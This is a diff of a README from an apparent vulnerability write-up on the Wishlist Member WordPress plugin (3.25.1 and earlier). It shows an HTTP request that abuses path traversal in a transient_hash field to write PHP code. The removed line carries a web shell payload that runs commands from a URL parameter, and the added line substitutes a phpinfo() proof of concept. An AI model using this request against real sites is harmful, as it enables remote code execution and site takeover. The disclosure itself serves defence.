i1zco/wishlist-member-vuln-analysis/README.md

 Host: example.com
 Content-Type: application/x-www-form-urlencoded

-transient_hash=../path/to/file.php&orig_email=<?php system($_GET['cmd']); ?>
+transient_hash=../../../username/public_html/info.php&orig_email=<?php phpinfo(); ?>
 ```

 ## Note
 This vulnerability was discovered in Wishlist Member version 3.25.1 and earlier.

-It has been patched by the vendor in a later release.
-No CVE ID has been assigned to this issue as of now.
+The vendor has patched it in a later release.
+A CVE identifier has not yet been assigned for this issue.